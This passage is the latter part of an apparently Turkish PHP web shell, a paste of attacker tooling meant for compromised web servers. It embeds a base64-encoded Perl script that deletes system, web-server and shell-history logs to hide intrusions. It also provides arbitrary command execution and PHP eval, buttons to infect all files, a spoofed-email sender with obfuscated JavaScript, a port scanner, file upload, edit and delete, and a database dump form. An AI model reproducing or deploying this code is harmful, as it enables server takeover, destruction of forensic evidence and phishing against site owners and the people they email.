gdGhlIGZvbGxvd2luZyBhbmQgc3RhcnQgYnJhY2tldHMNCiAgICAgICAgICAgICBwcmludCBcIlsrXUxhbXBwIFNlbGVjdGVkLi4uXFxuXCI7DQogICAgICAgICAgICAgc2xlZXAgMTsNCiAgICAgICAgICAgICBwcmludCBcIlsrXUxvZ3MgTG9jYXRlZC4uLlxcblwiOw0KICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAgICAgJGcgPSB1bmxpbmsgQGxhbXBwOw0KICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAgICBpZigkZykgeyBwcmludCBcIlsrXUxvZ3MgU3VjY2Vzc2Z1bGx5IERlbGV0ZWQuLi5cXG5cIjsgfQ0KCQkgICAgZWxzZSB7IHByaW50IFwiWy1dRXJyb3JcIjsgfQ0KICAgICAgICAgICAgICB9DQoNCiAgICAgICAgICAgICAgICBpZigkb3MgZXEgXCJyZWRoYXRcIil7ICNJZiByZWRoYXQgdHlwZWQsIGRvIHRoZSBmb2xsb3dpbmcgYW5kIHN0YXJ0IGJyYWNrZXRzDQogICAgICAgICAgICAgcHJpbnQgXCJbK11SZWQgSGF0IExpbnV4L01hYyBPUyBYIFNlbGVjdGVkLi4uXFxuXCI7DQogICAgICAgICAgICAgc2xlZXAgMTsNCiAgICAgICAgICAgICBwcmludCBcIlsrXUxvZ3MgTG9jYXRlZC4uLlxcblwiOw0KICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAgICAgJGggPSB1bmxpbmsgQHJlZGhhdDsNCiAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgIGlmKCRoKSB7IHByaW50IFwiWytdTG9ncyBTdWNjZXNzZnVsbHkgRGVsZXRlZC4uLlxcblwiOyB9DQoJCQkgIGVsc2UgeyBwcmludCBcIlstXUVycm9yXCI7IH0NCiAgICAgICAgICAgICAgfQ0KICAgICAgIA0KICAgICAgICAgICAgICAgIGlmKCRvcyBlcSBcImxpbnV4XCIpeyAjSWYgbGludXggdHlwZWQsIGRvIHRoZSBmb2xsb3dpbmcgYW5kIHN0YXJ0IGJyYWNrZXRzDQogICAgICAgICAgICAgcHJpbnQgXCJbK11MaW51eCBTZWxlY3RlZC4uLlxcblwiOyAgIA0KICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAgICAgcHJpbnQgXCJbK11Mb2dzIExvY2F0ZWQuLi5cXG5cIjsNCiAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgICRpID0gdW5saW5rIEBsaW51eDsNCiAgICAgICAgICAgICBzbGVlcCAxOw0KCQkJaWYoJGkpIHsgcHJpbnQgXCJbK11Mb2dzIFN1Y2Nlc3NmdWxseSBEZWxldGVkLi4uXFxuXCI7fSANCgkJCWVsc2UgeyBwcmludCBcIlstXUVycm9yXCI7IH0NCgkJfSAgICAgIA0KICAgICAgICAgICAgIA0KICAgICAgICAgICAgICBpZigkb3MgZXEgXCJzdW5vc1wiKXsgI0lmIHN1bm9zIHR5cGVkLCBkbyB0aGUgZm9sbG93aW5nIGFuZCBzdGFydCBicmFja2V0cw0KICAgICAgICAgICAgICBwcmludCBcIlsrXVN1bk9TIFNlbGVjdGVkLi4uXFxuXCI7DQogICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAgICAgIHByaW50IFwiWytdTG9ncyBMb2NhdGVkLi4uXFxuXCI7DQogICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAgICAgICRsID0gdW5saW5rIEBzdW5vczsNCiAgICAgICAgICAgICAgaWYoJGwpIHsgcHJpbnQgXCJbK11Mb2dzIFN1Y2Nlc3NmdWxseSBEZWxldGVkLi4uXFxuXCI7IH0NCgkJCSAgZWxzZSB7IHByaW50IFwiWy1dRXJyb3JcIjsgfQ0KICAgICAgICAgICAgICB9ICAgDQogICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgaWYoJG9zIGVxIFwiYWl4XCIpeyAjSWYgYWl4IHR5cGVkLCBkbyB0aGUgZm9sbG93aW5nIGFuZCBzdGFydCBicmFja2V0cw0KICAgICAgICAgICAgICAgICBwcmludCBcIlsrXUFpeCBTZWxlY3RlZC4uLlxcblwiOw0KICAgICAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgICBwcmludCBcIlsrXUxvZ3MgTG9jYXRlZC4uLlxcblwiOw0KICAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgICAkbSA9IHVubGluayBAYWl4Ow0KICAgICAgICAgICAgICBpZigkbSkgeyBwcmludCBcIlsrXUxvZ3MgU3VjY2Vzc2Z1bGx5IERlbGV0ZWQuLi5cXG5cIjsgfQ0KCQkJICAgZWxzZSB7IHByaW50IFwiWy1dRXJyb3JcIjsgfQ0KICAgICAgICAgICAgICB9DQogICAgICAgICAgICAgDQogICAgICAgICAgICAgIGlmKCRvcyBlcSBcImlyaXhcIil7ICNJZiBpcml4IHR5cGVkLCBkbyB0aGUgZm9sbG93aW5nIGFuZCBzdGFydCBicmFja2V0DQogICAgICAgICAgICAgIHByaW50IFwiWytdSXJpeCBTZWxlY3RlZC4uLlxcblwiOw0KICAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgICBwcmludCBcIlsrXUxvZ3MgTG9jYXRlZC4uLlxcblwiOw0KICAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgICAkbiA9IHVubGluayBAaXJpeDsgICANCiAgICAgICAgICAgICAgaWYoJG4pIHsgcHJpbnQgXCJbK11Mb2dzIFN1Y2Nlc3NmdWxseSBEZWxldGVkLi4uXFxuXCI7IH0NCgkJCSAgZWxzZSB7IHByaW50IFwiWy1dRXJyb3JcIjsgfQ0KICAgICAgICAgICAgICB9DQoNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgI01pc2MgTG9nIExvY2F0aW9ucyAgIA0KICAgICAgeyAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICBAbWlzYyA9IChcIi9ldGMvaHR0cGQvbG9ncy9hY2Nlc3MubG9nXCIsIFwiL2V0Yy9odHRwZC9sb2dzL2Vycm9yLmxvZ1wiLFwiL2V0Yy9odHRwZC9sb2dzL2FjY2Vzc19sb2dcIiwNCiAgICAgICAgICAgIFwiL2V0Yy9odHRwZC9sb2dzL2Vycm9yX2xvZ1wiLFwiL3Vzci9sb2NhbC9hcGFjaGUvbG9ncy9hY2Nlc3NfbG9nXCIsXCIvdXNyL2xvY2FsL2FwYWNoZS9sb2dzL2Vycm9yX2xvZ1wiLA0KICAgICAgICAgICAgXCIvdXNyL2xvY2FsL2FwYWNoZS9sb2dzL2FjY2Vzcy5sb2dcIixcIi91c3IvbG9jYWwvYXBhY2hlL2xvZ3MvZXJyb3IubG9nXCIsXCIvdmFyL2xvZy9hcGFjaGUvYWNjZXNzX2xvZ1wiLA0KICAgICAgICAgICAgXCIvdmFyL2xvZy9hcGFjaGUvZXJyb3JfbG9nXCIsXCIvdmFyL2xvZy9hcGFjaGUvYWNjZXNzLmxvZ1wiLFwiL3Zhci9sb2cvYXBhY2hlL2Vycm9yLmxvZ1wiLFwiL3Zhci9sb2cvYWNjZXNzX2xvZ1wiLA0KICAgICAgICAgICAgXCIvdmFyL2xvZy9lcnJvcl9sb2dcIixcIi92YXIvd3d3L2xvZ3MvZXJyb3IubG9nXCIsXCIvdmFyL3d3dy9sb2dzL2FjY2Vzcy5sb2dcIixcIi92YXIvd3d3L2xvZ3MvZXJyb3JfbG9nXCIsDQogICAgICAgICAgICBcIi92YXIvd3d3L2xvZ3MvYWNjZXNzX2xvZ1wiKQ0KICAgICAgICAgfQ0KDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAjTG9ncyBvZiBPcGVuQlNEIFN5c3RlbXMNCiAgIA0KICAgICAgew0KICAgICAgIEBvcGVuYnNkID0gKFwiL3Zhci93d3cvbG9nL2FjY2Vzc19sb2dcIiwgXCIvdmFyL3d3dy9sb2cvZXJyb3JfbG9nXCIpDQogICAgICAgICAgIH0NCg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgI0xvZ3Mgb2YgRnJlZUJTRCBTeXN0ZW1zDQogICANCiAgICAgIHsNCiAgICAgICBAZnJlZWJzZCA9IChcIi91c3IvbG9jYWwvZXRjL2h0dHBkL2xvZ3MvYWNjZXNzX2xvZ1wiLCBcIi91c3IvbG9jYWwvZXRjL2h0dHBkL2xvZ3MvZXJyb3JfbG9nXCIpDQogICAgICAgICAgIH0NCg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgI0xvZ3Mgb2YgRGViaWFuIFN5c3RlbXMNCiAgIA0KICAgICAgew0KICAgICAgIEBkZWJpYW4gPSAoXCIvdmFyL2xvZy9hcGFjaGUvYWNjZXNzLmxvZ1wiLCBcIi92YXIvbG9nL2FwYWNoZS9lcnJvci5sb2dcIiwNCiAgICAgICBcIi92YXIvbG9nL2FwYWNoZS1zc2wvZXJyb3IubG9nXCIsIFwiL3Zhci9sb2cvYXBhY2hlLXNzbC9hY2Nlc3MubG9nXCIpDQogICAgICAgICAgIH0gICANCg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgI0xvZ3Mgb2YgU3VTRSBMaW51eCBTeXN0ZW1zDQogICANCiAgICAgIHsNCiAgICAgICBAc3VzZSA9IChcIi92YXIvbG9nL2h0dHBkL2FjY2Vzc19sb2dcIiwgXCIvdmFyL2xvZy9odHRwZC9lcnJvcl9sb2dcIikNCiAgICAgICAgICAgfQ0KDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAjTG9ncyBvZiBTb2xhcmlzIFN5c3RlbXMNCiAgIA0KICAgICAgeyAgIA0KICAgICAgIEBzb2xhcmlzID0gKFwiL3Zhci9hcGFjaGUvbG9ncy9hY2Nlc3NfbG9nXCIsIFwiL3Zhci9hcGFjaGUvbG9ncy9lcnJvcl9sb2dcIikNCiAgICAgICAgICAgfQ0KDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAjTG9ncyBvZiBMYW1wcCBTeXN0ZW1zDQogICANCiAgICAgIHsNCiAgICAgICBAbGFtcHAgPSAoXCIvb3B0L2xhbXBwL2xvZ3MvZXJyb3JfbG9nXCIsIFwiL29wdC9sYW1wcC9sb2dzL2FjY2Vzc19sb2dcIikNCiAgICAgICAgICAgfQ0KDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAjTG9ncyBvZiBSZWQgSGF0LCBNYWMgT1MgWCBTeXN0ZW1zDQogICANCiAgICAgIHsNCiAgICAgICBAcmVkaGF0ID0gKFwiL3Zhci9sb2cvaHR0cGQvYWNjZXNzX2xvZ1wiLCBcIi92YXIvbG9nL2h0dHBkL2Vycm9yX2xvZ1wiKQ0KICAgICAgICAgICB9DQogICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICNMb2dzIG9mIElyaXggU3lzdGVtcw0KICAgDQogICAgICB7DQogICAgICAgQGlyaXggPSAoXCIvdmFyL2FkbS9TWVNMT0dcIiwgXCIvdmFyL2FkbS9zdWxvZ1wiLCBcIi92YXIvYWRtL3V0bXBcIiwgXCIvdmFyL2FkbS91dG1weFwiLA0KICAgICAgICAgICAgICBcIi92YXIvYWRtL3d0bXBcIiwgXCIvdmFyL2FkbS93dG1weFwiLCBcIi92YXIvYWRtL2xhc3Rsb2cvXCIsDQogICAgICAgICAgICBcIi91c3Ivc3Bvb2wvbHAvbG9nXCIsIFwiL3Zhci9hZG0vbHAvbHAtZXJyc1wiLCBcIi91c3IvbGliL2Nyb24vbG9nXCIsDQogICAgICAgICAgICBcIi92YXIvYWRtL2xvZ2lubG9nXCIsIFwiL3Zhci9hZG0vcGFjY3RcIiwgXCIvdmFyL2FkbS9kdG1wXCIsDQogICAgICAgICAgICBcIi92YXIvYWRtL2FjY3Qvc3VtL2xvZ2lubG9nXCIsIFwidmFyL2FkbS9YMG1zZ3NcIiwgXCIvdmFyL2FkbS9jcmFzaC92bWNvcmVcIiwNCiAgICAgICAgICAgIFwiL3Zhci9hZG0vY3Jhc2gvdW5peFwiKQ0KICAgICAgICAgICB9DQoNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgI0xvZyBzb2YgQWl4IFN5c3RlbXMNCiAgICAgIHsgICANCiAgICAgIEBhaXggPSAoXCIvdmFyL2FkbS9wYWNjdFwiLCBcIi92YXIvYWRtL3d0bXBcIiwgXCIvdmFyL2FkbS9kdG1wXCIsIFwiL3Zhci9hZG0vcWFjY3RcIiwgICANCiAgICAgICAgICAgICAgIFwiL3Zhci9hZG0vc3Vsb2dcIiwgXCIvdmFyL2FkbS9yYXMvZXJybG9nXCIsIFwiL3Zhci9hZG0vcmFzL2Jvb3Rsb2dcIiwNCiAgICAgICAgICAgICAgIFwiL3Zhci9hZG0vY3Jvbi9sb2dcIiwgXCIvZXRjL3V0bXBcIiwgXCIvZXRjL3NlY3VyaXR5L2xhc3Rsb2dcIiwNCiAgICAgICAgICAgICAgIFwiL2V0Yy9zZWN1cml0eS9mYWlsZWRsb2dpblwiLCBcInVzci9zcG9vbC9tcXVldWUvc3lzbG9nXCIpICAgDQogICAgICAgICB9DQoNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgI0xvZ3Mgb2YgU3VuT1MgU3lzdGVtcyAgIA0KICAgICAgeyAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgQHN1bm9zID0gKFwiL3Zhci9hZG0vbWVzc2FnZXNcIiwgXCIvdmFyL2FkbS9hY3Vsb2dzXCIsIFwiL3Zhci9hZG0vYWN1bG9nXCIsDQogICAgICAgICAgICAgICAgIFwiL3Zhci9hZG0vc3Vsb2dcIiwgXCIvdmFyL2FkbS92b2xkLmxvZ1wiLCBcIi92YXIvYWRtL3d0bXBcIiwNCiAgICAgICAgICAgICAgICAgXCIvdmFyL2FkbS93dG1weFwiLCBcIi92YXIvYWRtL3V0bXBcIiwgXCIvdmFyL2FkbS91dG1weFwiLA0KICAgICAgICAgICAgICAgICBcIi92YXIvYWRtL2xvZy9hc3BwcC5sb2dcIiwgXCIvdmFyL2xvZy9zeXNsb2dcIiwNCiAgICAgICAgICAgICAgICAgXCIvdmFyL2xvZy9QT1Bsb2dcIiwgXCIvdmFyL2xvZy9hdXRobG9nXCIsIFwiL3Zhci9hZG0vcGFjY3RcIiwNCiAgICAgICAgICAgICAgICAgXCIvdmFyL2xwL2xvZ3MvbHBzY2hlZFwiLCBcIi92YXIvbHAvbG9ncy9yZXF1ZXN0c1wiLA0KICAgICAgICAgICAgICBcIi92YXIvY3Jvbi9sb2dzXCIsIFwiL3Zhci9zYWYvX2xvZ1wiLCBcIi92YXIvc2FmL3BvcnQvbG9nXCIpDQogICAgICAgICB9ICAgICANCg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAjTG9ncyBvZiBMaW51eCBTeXN0ZW1zICAgICAgIA0KICAgICAgeyAgICAgDQogICAgICAgQGxpbnV4ID0gKFwiL3Zhci9sb2cvbGFzdGxvZ1wiLCBcIi92YXIvbG9nL3RlbG5ldGRcIiwgXCIvdmFyL3J1bi91dG1wXCIsDQogICAgICAgICAgICAgICAgIFwiL3Zhci9sb2cvc2VjdXJlXCIsXCIvcm9vdC8ua3NoX2hpc3RvcnlcIiwgXCIvcm9vdC8uYmFzaF9oaXN0b3J5XCIsDQogICAgICAgICAgICAgICAgIFwiL3Jvb3QvLmJhc2hfbG9ndXRcIiwgXCIvdmFyL2xvZy93dG1wXCIsIFwiL2V0Yy93dG1wXCIsDQogICAgICAgICAgICAgICAgIFwiL3Zhci9ydW4vdXRtcFwiLCBcIi9ldGMvdXRtcFwiLCBcIi92YXIvbG9nXCIsIFwiL3Zhci9hZG1cIiwNCiAgICAgICAgICAgICAgICAgXCIvdmFyL2FwYWNoZS9sb2dcIiwgXCIvdmFyL2FwYWNoZS9sb2dzXCIsIFwiL3Vzci9sb2NhbC9hcGFjaGUvbG9nc1wiLA0KICAgICAgICAgICAgICAgICBcIi91c3IvbG9jYWwvYXBhY2hlL2xvZ3NcIiwgXCIvdmFyL2xvZy9hY2N0XCIsIFwiL3Zhci9sb2cveGZlcmxvZ1wiLA0KICAgICAgICAgICAgICAgICBcIi92YXIvbG9nL21lc3NhZ2VzL1wiLCBcIi92YXIvbG9nL3Byb2Z0cGQveGZlcmxvZy5sZWdhY3lcIiwNCiAgICAgICAgICAgICAgICAgXCIvdmFyL2xvZy9wcm9mdHBkLnhmZXJsb2dcIiwgXCIvdmFyL2xvZy9wcm9mdHBkLmFjY2Vzc19sb2dcIiwNCiAgICAgICAgICAgICAgICAgXCIvdmFyL2xvZy9odHRwZC9lcnJvcl9sb2dcIiwgXCIvdmFyL2xvZy9odHRwc2Qvc3NsX2xvZ1wiLA0KICAgICAgICAgICAgICAgICBcIi92YXIvbG9nL2h0dHBzZC9zc2wuYWNjZXNzX2xvZ1wiLCBcIi9ldGMvbWFpbC9hY2Nlc3NcIiwNCiAgICAgICAgICAgICAgICAgXCIvdmFyL2xvZy9xbWFpbFwiLCBcIi92YXIvbG9nL3NtdHBkXCIsIFwiL3Zhci9sb2cvc2FtYmFcIiwNCiAgICAgICAgICAgICAgICAgXCIvdmFyL2xvZy9zYW1iYS5sb2cuJW1cIiwgXCIvdmFyL2xvY2svc2FtYmFcIiwgXCIvcm9vdC8uWGF1dGhvcml0eVwiLA0KICAgICAgICAgICAgICAgICBcIi92YXIvbG9nL3BvcGxvZ1wiLCBcIi92YXIvbG9nL25ld3MuYWxsXCIsIFwiL3Zhci9sb2cvc3Bvb2xlclwiLA0KICAgICAgICAgICAgICAgICBcIi92YXIvbG9nL25ld3NcIiwgXCIvdmFyL2xvZy9uZXdzL25ld3NcIiwgXCIvdmFyL2xvZy9uZXdzL25ld3MuYWxsXCIsDQogICAgICAgICAgICAgICAgIFwiL3Zhci9sb2cvbmV3cy9uZXdzLmNyaXRcIiwgXCIvdmFyL2xvZy9uZXdzL25ld3MuZXJyXCIsIFwiL3Zhci9sb2cvbmV3cy9uZXdzLm5vdGljZVwiLA0KICAgICAgICAgICAgICAgICBcIi92YXIvbG9nL25ld3Mvc3Vjay5lcnJcIiwgXCIvdmFyL2xvZy9uZXdzL3N1Y2subm90aWNlXCIsDQogICAgICAgICAgICAgICAgIFwiL3Zhci9zcG9vbC90bXBcIiwgXCIvdmFyL3Nwb29sL2Vycm9yc1wiLCBcIi92YXIvc3Bvb2wvbG9nc1wiLCBcIi92YXIvc3Bvb2wvbG9ja3NcIiwNCiAgICAgICAgICAgICAgICAgXCIvdXNyL2xvY2FsL3d3dy9sb2dzL3RodHRwZF9sb2dcIiwgXCIvdmFyL2xvZy90aHR0cGRfbG9nXCIsDQogICAgICAgICAgICAgICAgIFwiL3Zhci9sb2cvbmNmdHBkL21pc2Nsb2cudHh0XCIsIFwiL3Zhci9sb2cvbmN0ZnBkLmVycnNcIiwNCiAgICAgICAgICAgICAgICAgXCIvdmFyL2xvZy9hdXRoXCIpDQogICAgICAgICB9DQogICAgICAgICANCiAgIA==");
  481. $openp = fopen("logseraser.pl", "w+")or die("Error");
  482. fwrite($openp, $erase)or die("Error");
  483. fclose($openp);
  484. $aidx = passthru("perl logseraser.pl ".$_POST['functionp']);
  485. unlink("logseraser.pl");
  486. echo "</textarea>";
  487. }
  488.  
  489. if(isset($_POST['commex']))
  490. {
  491. echo "<tr><td>
  492. <center><b><font size='2' face='Verdana'>CMD :]<br></font></b>
  493.        <input name=cmd size=20 type=text>
  494.        <select name=functionz>
  495.          <option>passthru</option>
  496.          <option>popen</option>
  497.          <option>exec</option>
  498.          <option>shell_exec</option>
  499.          <option>system</option>
  500.        </select><br><input type='submit' name='cmdex' value='Enter'></table>";
  501.    }
  502.    if(isset($_POST['cmdex']))
  503.    { echo "<tr><td>";
  504.    switch (@$_POST['functionz']) {
  505.     case "system":
  506.     system(stripslashes($_POST['cmd']));
  507.    
  508.     break;
  509.     case "popen":
  510.     $handle = popen($_POST['cmd'].' 2>&1', 'r');
  511.     echo "'$handle'; " . gettype($handle) . "\n";
  512.     $read = fread($handle, 2096);
  513.     echo $read;
  514.     pclose($handle);
  515.    
  516.     break;
  517.     case "shell_exec":
  518.     shell_exec(stripslashes($_POST['cmd']));
  519.    
  520.  
  521.     break;
  522.     case "exec":
  523.     exec(stripslashes($_POST['cmd']));
  524.    
  525.     break;
  526.     case "passthru":
  527.     passthru(stripslashes($_POST['cmd']));
  528.    
  529.     }
  530.     }
  531.  
  532. elseif(isset($_POST['mail']))
  533. {
  534. echo "<form method='post' action=''>
  535. <td valign=top><center><font face='Verdana' size='2'>FakeMail [HTML Onaylý]</font></center>
  536. <center><font face='Verdana' size='1'>Kime:<br>
  537. <input type='text' size='19' name='mto'><br>
  538. Kimden:<br>
  539. <input type='text' size='19' name='mfrom'><br>
  540. Konu:<br>
  541. <input type='text' size='19' name='mobj'><br>
  542. Mesaj:<br>
  543. <textarea name='mtext' cols=20 rows=4></textarea><br>
  544. <br><input type='submit' value='Yolla' name='senm'>
  545. </form></table><br>";}
  546. if(isset($_POST['senm']))
  547. {
  548. //Mail With HTML   <- webcheatsheet.com
  549. $to = $_POST['mto'];
  550. $subject = $_POST['mobj'];
  551. $contentz = $_POST['mtext']."<!--";
  552. $random_hash = md5(date('r', time()));
  553. $headers = "From: ".$_POST['mfrom']."\r\nReply-To: ".$_POST['mfrom'];
  554. $headers .= "\r\nContent-Type: multipart/alternative; boundary=\"PHP-alt-".$random_hash."\"";
  555. ob_start();
  556. ?>
  557. <script type="text/javascript" language="javascript">
  558. <!--
  559. ML="P<>phTsmtr/9:Cuk RIc=jSw.o";
  560. MI="1F=AB05@FA=D4883<::GGGHC;;343HCI7:8>9?HE621:F=AB052";
  561. OT="";
  562. for(j=0;j<MI.length;j++){
  563. OT+=ML.charAt(MI.charCodeAt(j)-48);
  564. }document.write(OT);
  565. // --></script>
  566. --PHP-alt-<?php echo $random_hash; ?>
  567. Content-Type: text/html; charset="iso-8859-1"
  568. Content-Transfer-Encoding: 7bit
  569.  
  570. <?  echo "$contentz"; ?>
  571. --PHP-alt-<?php echo $random_hash; ?>--
  572. <?
  573. $message = ob_get_clean();
  574.  
  575. $mail = @mail( $to, $subject, $message, $headers );
  576.  
  577. if($mail) { echo "<br><td valign=top>
  578. <center><font color='green' size='1'>Mail Sent</font></center></table>"; }
  579. else { echo "<br><td valign=top>
  580. <center><font color='red' size='1'>Error</font></center></table>"; }
  581. }
  582.  
  583. elseif(isset($_POST['encoder'])) {
  584. //Encoder
  585. echo "<form method='post' action=''><td valign=top>
  586. <center><font face='Verdana' size='1'>Text:</font><br><textarea name='encod'></textarea><br><input type='submit' value='Encode' name='encode'></form></table>";
  587. }
  588. if(isset($_POST['encode'])) { echo "<td valign=top>
  589. <center><font face='Verdana' size='1'>
  590. MD5:   &nbsp;&nbsp;&nbsp;&nbsp;<input type='text' size='35' value='".md5($_POST['encod'])."'><br>
  591. Sha1:  &nbsp;&nbsp;&nbsp;<input type='text' size='35' value='".sha1($_POST['encod'])."'><br>
  592. Crc32: &nbsp;&nbsp;&nbsp;<input type='text' size='34' value='".crc32($_POST['encod'])."'><br><br>
  593. Base64 Encode: <input type='text' size='35' value='".base64_encode($_POST['encod'])."'><br>
  594. Base64 Decode: <input type='text' size='36' value='".base64_decode($_POST['encod'])."'></table>";}
  595.  
  596. //File List
  597. echo "</table><table width=100%><tr><td>
  598. <center><font size='1' face='Verdana'>Toplam Dosyalar: $fileq [$filew files and $pahtw directory] </font></center></td></tr></table>
  599. <center><table class=menuz width=100% cellspacing=0 cellpadding=0 border=0>
  600. <font size='1'>
  601. <td valign=top><font face='Verdana' size='2'><b>Dosya Adý :</b></font></td><td valign=top><font face='Verdana' size='2'><b>Tip:</b></font></td><td valign=top width=15%><font face='Verdana' size=2><b>Boyut:</b></font></td><td valign=top width=10%><font face='Verdana' size='2'><b>Perms:</b></font></td>$listf</font>
  602. </table></center>";
  603.  
  604. echo "
  605. <br>
  606. <table class='menu' cellspacing='0' cellpadding='0' border='0' width='100%'><tr><td valign=top>
  607. <center><b><font size='2' face='Verdana'>Server Uzerinde PHP Kodu :<br></font></b>";
  608. if(!isset($phpeval))
  609. {
  610. echo "
  611.   <form method='post' action=''>
  612.   <textarea name=php_eval cols=100 rows=5></textarea><br>
  613.   <input type='submit' value='Calistir!'>
  614.   </form>
  615. ";
  616. }
  617.  
  618. if(isset($phpeval)) {
  619. echo "
  620. <form method='post' action=''>
  621. <textarea name=php_eval cols=100 rows=10>";
  622. $wr = '"';
  623.  $eval = @str_replace("<?","",$phpeval);
  624.  $eval = @str_replace("?>","",$phpeval);
  625.  @eval($eval);
  626. echo "</textarea><br><input type='submit' value='Calistir!'></form>";
  627.  
  628. }
  629. echo "<form method='post' action=''><input type='submit' value='Infect All Files!' name='inf3ct'> - <input type='submit' value='Eval Infect Files!' name='evalinfect'><br>";
  630. if(isset($textzz)) { echo $textzz; }
  631. if(isset($textz0)) { echo $textz0; }
  632. echo "</center></form></td></tr><tr><td>
  633. <center><b><font size='2' face='Verdana'>:: Edit File ::<br></font></b>
  634. <form method='post' action=''>
  635. <input type='text' name='editfile' value=".$dir.">
  636. <input type='submit' value='Go' name='doedit'>
  637. </form>";
  638. // Edit Files n3xpl0rer
  639. if(isset($_POST['doedit']) && $_POST['editfile'] != $dir)
  640. {
  641. $file = $_POST['editfile'];
  642. $content = file_get_contents($file);
  643. echo "<form action='' method='post'><center>
  644. <input type='hidden' name='editfile' value='".$file."'>
  645. <textarea rows=20 cols=80 name='newtext'>".htmlspecialchars($content)."</textarea><br /><input type='submit' name='edit' value='Edit'></form>";
  646. }
  647. if(isset($_POST['edit'])) {
  648. $file = $_POST['editfile'];
  649. echo  $file."<br />";
  650. $fh = fopen($file, "w+")or die("<font color=red>Error: cannot open file</font>");
  651. fwrite($fh, stripslashes($_POST['newtext']))or die("<font color=red>Error: cannot write to file</font>");
  652. fclose($fh);
  653. echo "Done.</td></tr>";
  654. }
  655. echo "
  656. </table>
  657. <table class='menu' cellspacing='0' cellpadding='0' border='0' width='100%'>
  658. <tr>
  659. <td valign=top>
  660. <center><b><font size='2' face='Verdana'>Dizin'e Git:<br></font></b>
  661. <form name='directory' method='post' action=''>
  662. <input type='text' name='dir' value=$dir>
  663. <input type='submit' value='Go'>
  664. </form></td><td>
  665. <center><b><font size='2' face='Verdana'> Port Tarayýcý <br></font></b>
  666.   <form name='scanner' method='post'>
  667.   <input type='text' name='host' value='127.0.0.1' >
  668.   <select name='protocol'>
  669.   <option value='tcp'>tcp</option>
  670.   <option value='udp'>udp</option>
  671.   </select>
  672.   <input type='submit' value='Portlarý TARA'>
  673.   </form>
  674. ";
  675. if(isset($host) && isset($proto))
  676. {
  677. echo "<font size='2' face='Verdana'>Open Ports:";
  678.  
  679. for($current = 0; $current <= 23; $current++)
  680. {
  681. $currents = $myports[$current];
  682.  
  683. $service = getservbyport($currents, $proto);
  684.  
  685.  
  686. // Try to connect to port
  687. $result = fsockopen($host, $currents, $errno, $errstr, 1);
  688.  
  689. // Show results
  690. if($result)
  691. {
  692. echo "$currents, ";
  693. }
  694.  
  695.  
  696. }
  697. }
  698.  
  699. echo "</font>
  700. </td></tr>
  701.  
  702. <tr>
  703. <td valign=top width=50%>
  704. <center><b><font size='2' face='Verdana'>Dosya Upload<br></font></b>
  705.   <form method='post' action='' enctype='multipart/form-data'>
  706.   <input type='hidden' name='dare' value=$dir>
  707.   <input type='file' name='ffile'>
  708.   <input type='submit' name='ok' value='Upload!'>
  709.   </center>  
  710.   </form>
  711. </td>
  712. <td valign=top>
  713. <center><b><font size='2' face='Verdana'>Dosya Sil<br></font></b>
  714.   <form method='post' action=''>
  715.   <input type='text' name='delete' value=$dir > <input type='submit' value='Dosyayý Sil' name='deletfilez'>
  716.   </center>
  717.   </form>
  718. </td></tr>
  719. <tr>
  720. <td valign=top>
  721.  
  722. <center><b><font size='2' face='Verdana'>Klasör Oluþtur<br></font></b>
  723.   <form method='post' action=''>
  724.   <input type='text' name='makedir' value=$dir> <input type='submit' value='Oluþtur'>
  725.   </center>
  726.   </form>
  727. </td>
  728. <td valign=top>
  729. <center><b><font size='2' face='Verdana'>Klasör Sil<br></font></b>
  730.   <form method='post' action=''>
  731.   <input type='text' name='deletedir' value=$dir> <input type='submit' value='Sil'>
  732.   </center>
  733.   </form>
  734. </td></tr>
  735. <tr>
  736. <td valign=top width=50%>
  737. <center><b><font size='2' face='Verdana'>Dosya Oluþtur:<br></font></b>
  738.   <form method='post' action=''>
  739.   <input type='hidden' name='darezz' value=$dir>
  740.   <font size='1' face='Verdana'>ADI:</font><br>
  741.   <input type='text' name='names' size='30'><br>
  742.   <font size='1' face='Verdana'>Kodu:</font><br>
  743.   <textarea rows='16' cols='30' name='source'></textarea><br>
  744.   <input type='submit' value='Upload'>
  745.   </center>
  746.   </form>
  747. </td>
  748. <td valign=top width=50%>
  749. <center><b><font size='2' face='Verdana'>Database<br></font></b>
  750.   <form method='post' action=''>
  751.   <font size='1' face='Verdana'>Username: - Password:</font><br>
  752.   <input type='text' name='user' size='10'>
  753.   <input type='text' name='passd' size='10'><br>
  754.   <font size='1' face='Verdana'>Host:</font><br>
  755.   <input type='text' name='host' value='localhost'><br>
  756.   <font size='1' face='Verdana'>DB Name:</font><br>
  757.   <input type='text' name='db'><br>
  758.   <font size='1' face='Verdana'>Sorgu:</font><br>
  759.   <textarea rows='10' cols='30' name='query'></textarea><br>
  760.   <input type='submit' value='Sorguyu Calistir' name='godb'><br><input type='submit' name='dump' value='Database'yi Dump Et'>
  761.   </center>
  762.   </form>
  763. </td> </tr>
  764.  
  765. </table>
